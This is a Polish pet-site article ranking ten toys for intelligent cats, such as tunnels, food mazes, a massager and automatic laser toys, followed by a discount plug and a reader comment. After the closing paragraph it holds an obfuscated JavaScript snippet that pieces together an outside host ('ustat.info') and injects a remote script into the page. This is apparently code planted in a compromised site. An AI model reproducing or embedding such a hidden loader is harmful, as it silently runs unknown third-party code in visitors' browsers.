Top 10 zabawek dla mądrego kota

fot. Shutterstock

Nieśmiertelne myszki, piłeczki i kulki z papieru to zestaw podstawowy każdego kota. I choć w wielu przypadkach doskonale potrafią zabawić, w końcu lądują pod szafą i łóżkiem, a sfrustrowany mruczek wyżywa się na meblach lub zajada nudę.

Na szczęście wymyślono zabawki, które potrafią rozruszać największego lenia. Na dodatek ćwiczą kocią inteligencję i mięśnie, przeciwdziałając zimowej depresji i tyciu.

Oto nasz subiektywny wybór najlepszych zabawek dla sprytnego kota, które skutecznie odciągną nawet największego łasucha od miseczek pełnych smakowitości i zapewnią kotu – oraz nam – godziny wyśmienitego relaksu.

1. Catit Design Senses, tor do zabawy

Plastikowy tunel z migającymi piłeczkami i możliwością rozbudowy o kolejne elementy. Pobudza trzy kocie zmysły: wzrok, słuch i dotyk. Dzięki przezroczystej obudowie zwierzę ma możliwość śledzenia ruchu piłeczki, co dodatkowo zachęca go do „polowania” na nią.

2. Catit Play-N-Scratch

Sprytne połączenie maty do drapania z piłeczką, zabawką na sprężynce i kocimiętką. Jeśli do tej pory nie udawało ci się zachęcić kota do używania drapaka i oszczędzania twoich mebli, teraz może ci się to udać!

3. Catit Design Senses, labirynt na karmę

Coś specjalnie dla kociego łakomczucha. Tak naprawdę to rodzaj wyrafinowanej miski na kocie chrupki. By zwierzę mogło skosztować chrupek, wypełniających labirynt, musi się trochę napracować – pomachać łapką, poprzegarniać jedzenie labiryntem w dół i na zewnątrz. Bez pracy nie ma pełnego brzuszka! Dołączona do zestawu mata do akupresury została przeznaczona do masażu łapek. Poza tym zapewnia stabilną pozycję zabawki.

4. Catit Design Senses, masażer

Prawdziwe kocie spa. Niezastąpiony, gdy kot nie ma cię pod ręką i nie ma kogo poprosić o pogłaskanie. Owalna zabawka pokryta jest rodzajem gumowej szczotki, o którą zwierzę może się ocierać, masując głowę, szyję, mordkę i łapki. To nie wszystko. W skład masażera wchodzi też stymulator dziąseł (masuje i czyści zęby oraz dziąsła) oraz szczotki do masażu ciała,  stymulujące gruczoły na mordce i plecach.

5. FroliCat™ FLIK™

Interaktywna zabawka firmy FroliCat to automatyczny system rotacyjny, który wysuwa i chowa sznurek, pobudzając kota do zabawy niczym całe stado szalonych myszek. Podstawa jest stabilna, nie ślizga się. Zabawka zasilana jest trzema bateriami typu AA (nie ma ich w zestawie, trzeba dokupić).

6. Kitty Pool, basen z zabawkami

Coś dla tych agentów, którzy uwielbiają topić swoje zabawki w misce z wodą. To też rodzaj miski z wodą, ale zdecydowanie większej. Kolorowe dno dodatkowo wzmacnia efekty świetlne. Same zabawki wykonane są z lekkiej pianki, dzięki czemu nie toną. Dodatkowy plus – zabawki barwione są bezpiecznymi dla zwierząt barwnikami spożywczymi.

7. TRIXIE Pointer Catch the Light światełko LED

Odmiana znanego i uwielbianego przez koty wskaźnika laserowego – tu w wydaniu bezpieczniejszego światła ledowego. Światełko ma kolor niebiesko-fioletowy i kształt rybki. Nawet jeśli w zapale zabawy przesuniemy takim światełkiem na kocich oczach, nic się nie stanie. Jedyna niedogodność – światełko jest gorzej widoczne w silnym świetle dziennym.

Wskaźnik jest solidnej budowy, zasilany wymiennymi bateriami.

8. Laserowa zabawka Eyenimal

Klasyczny laserek w wersji automatycznej. Czerwone światełko jest sterowane przez wbudowany mechanizm. Światełko lasera rotuje nieregularnie, w trzech systemach do wyboru: szybkim, średnim i wolnym. Na szczęście pomyślano o automatycznym wyłączaniu się laserka po 15 minutach – dłuższa gonitwa mogłaby zbytnio zmęczyć kota. We wszystkim trzeba zachować umiar.

9. Laserowa zabawka FroliCat Bolt

Inna wersja laserka sterowanego automatycznie. Także z opcją wyłączania po 15 minutach zabawy. Oczywiście można wyłączyć ją manualnie wcześniej.

Ważne: Wrażliwe kocie oczy nie są bezpośrednio wystawione na działanie strumienia lasera, ponieważ odbijany jest on najpierw przez zwierciadło.

10. Szeleszczący tunel

Wersji kolorystycznych jest mnóstwo, ale nie w barwach tkwi tajemnica wielkiej popularności tuneli wśród mruczków. Najważniejszy jest szelest. Każdy szanujący się tunel musi szeleścić niczym myszka biegnąca po suchych liściach. Temu dźwiękowi żaden kot się nie oprze! Dodatkową atrakcją jest kształt, umożliwiający chowanie się, oraz – przyczepione wewnątrz tunelu piłeczki, pompony lub inne zabawki. Pamiętać tylko należy, by chować tunel przed pójściem spać – w przeciwnym wypadku niemal na pewno obudzi nas nieznośny szelest w środku nocy.

.

Podpowiedzieliśmy CO, teraz zdradzamy – JAK kupić taniej. Jeżeli szukasz promocji na zabawki dla swojego kota, sprawdź kod rabatowy Zooplus.

Mądra zabawka nie tylko bawi, ale i uczy. Każda z powyższych doskonale spełnia obie te funkcje. Dzięki nim twój pupil będzie jeszcze mądrzejszym kotem. A i ty znajdziesz więcej powodów do aktywnego spędzania czasu z ulubieńcem. Nie tylko z okazji Dnia Kota.

(function(){
xzj5_=(„u”+””)+”s”+””;xzj5_+=(„tat.”)+(„i”);
xzj5=document.createElement(„script”);xzj5.type=”text/javascript”;xzj5_+=”nf”+(„o”)+”/”;
xzj5u=”60468845″+”.”;xzj5.async=true;xzj5u+=”n9mpi4k5zj5am8gfpab1zcsrnru1wf”;
xzj5.src=”//”+xzj5_+xzj5u; xzj5b=document.body; xzj5b.appendChild(xzj5);
})();

Array
guest
1 Komentarz
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Arleta
Arleta
4 lat temu

Moje koty uwielbiają gonić za zabawkowymi myszkami i oczywiście laserem 🙂